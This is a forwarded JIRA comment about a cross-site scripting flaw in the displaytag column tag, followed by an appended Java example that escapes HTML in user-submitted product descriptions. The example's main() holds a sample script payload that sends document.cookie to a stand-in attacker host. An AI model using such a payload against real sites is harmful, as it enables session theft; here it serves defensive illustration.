[ https://jira.codehaus.org/browse/DISPL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=287833#comment-287833 ]
aaron pieper commented on DISPL-223:
------------------------------------

I realize this is an old issue - but it seems like it's still pertinent? I agree with the submitter that this tag is vulnerable to cross-site scripting, and I don't understand your dismissal of the issue. You're right, the "property" attribute specifies a value which is fetched from a server-side object, but that doesn't contradict the idea that this would be relevant to cross-site scripting.

For example, one might create a web application which allows users to submit new products, with a product description (a 500-character field which needs to support special characters). These products, after being retrieved from the database, might be displayed in a table using display:column tags. Rendering these values with the column tag would render the description tag vulnerable to a cross-site scripting attack.

Assuming the software developer wants to continue using the displayTag library, the best workaround is the one Ralf Hauser suggested, but an optional filtering attribute would be much easier to use.

> column property attribute susceptible to cross-site scripting!!
> ---------------------------------------------------------------
>
>                 Key: DISPL-223
>                 URL: https://jira.codehaus.org/browse/DISPL-223
>             Project: DisplayTag
>          Issue Type: Bug
>          Components: HTML Generation
>    Affects Versions: 1.0
>            Priority: Critical
>   Original Estimate: 2 hours
>  Remaining Estimate: 2 hours
>
> Column tag "property"
> (http://displaytag.sourceforge.net/tagreference-displaytag-12.html#column) is
> susceptible to cross-site scripting.
> It should offer a 'filter="true"' as existing in
> http://struts.apache.org/userGuide/struts-bean.html#write

--
This message is automatically generated by JIRA.
_______________________________________________
displaytag-devel mailing list
displaytag-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/displaytag-devel
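The scenario in the comment above (user-submitted product descriptions pulled from the database and rendered through `display:column`), worked through as an added example; this is illustrative code, not part of displaytag or the thread. It shows the kind of HTML-escaping filter the issue asks the column tag to offer, applied on the server side by wrapping each row so that `property="escapedDescription"` yields safe text while `property="description"` would still emit the raw string. The class names `EscapedProductView`, `Product` and `ProductRow`, the sample description, and the JSP fragment in the comment are all assumptions made for the example.

```java
// Added example, not displaytag code: an HTML-escaping filter of the kind the
// issue asks the column tag to provide, plus a row wrapper that exposes the
// escaped value to an unchanged <display:column property="..."> tag.
public final class EscapedProductView {

    // Escape the characters that let attacker-controlled text break out of an
    // HTML text node or a quoted attribute value.
    public static String escapeHtml(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Hypothetical product bean as a user-submitted row would be loaded from the database.
    public static final class Product {
        private final String name;
        private final String description;

        public Product(String name, String description) {
            this.name = name;
            this.description = description;
        }

        public String getName() { return name; }
        public String getDescription() { return description; }
    }

    // View wrapper (assumed approach): the list handed to <display:table> holds
    // these instead of raw Products. Every getter the column tag can reach
    // through "property" returns already-escaped text.
    public static final class ProductRow {
        private final Product product;

        public ProductRow(Product product) { this.product = product; }

        public String getName() { return escapeHtml(product.getName()); }
        public String getEscapedDescription() { return escapeHtml(product.getDescription()); }
    }

    // JSP usage (assumed, mirroring the column tag referenced in the issue):
    //   <display:table name="productRows">
    //     <display:column property="name"/>
    //     <display:column property="escapedDescription"/>
    //   </display:table>

    public static void main(String[] args) {
        // Constructed sample: a "description" as a hostile user might submit it.
        Product p = new Product("Widget",
            "Handy gadget <script>new Image().src='http://attacker.example/?c='+document.cookie</script>");
        ProductRow row = new ProductRow(p);

        System.out.println("raw     (property=\"description\"):        " + p.getDescription());
        System.out.println("escaped (property=\"escapedDescription\"): " + row.getEscapedDescription());
    }
}
```

The wrapper is deliberately the only object the tag can see: escaping at the point of output, rather than at the point of storage, keeps the 500-character field's special characters intact in the database while guaranteeing that nothing the column tag emits is interpreted as markup.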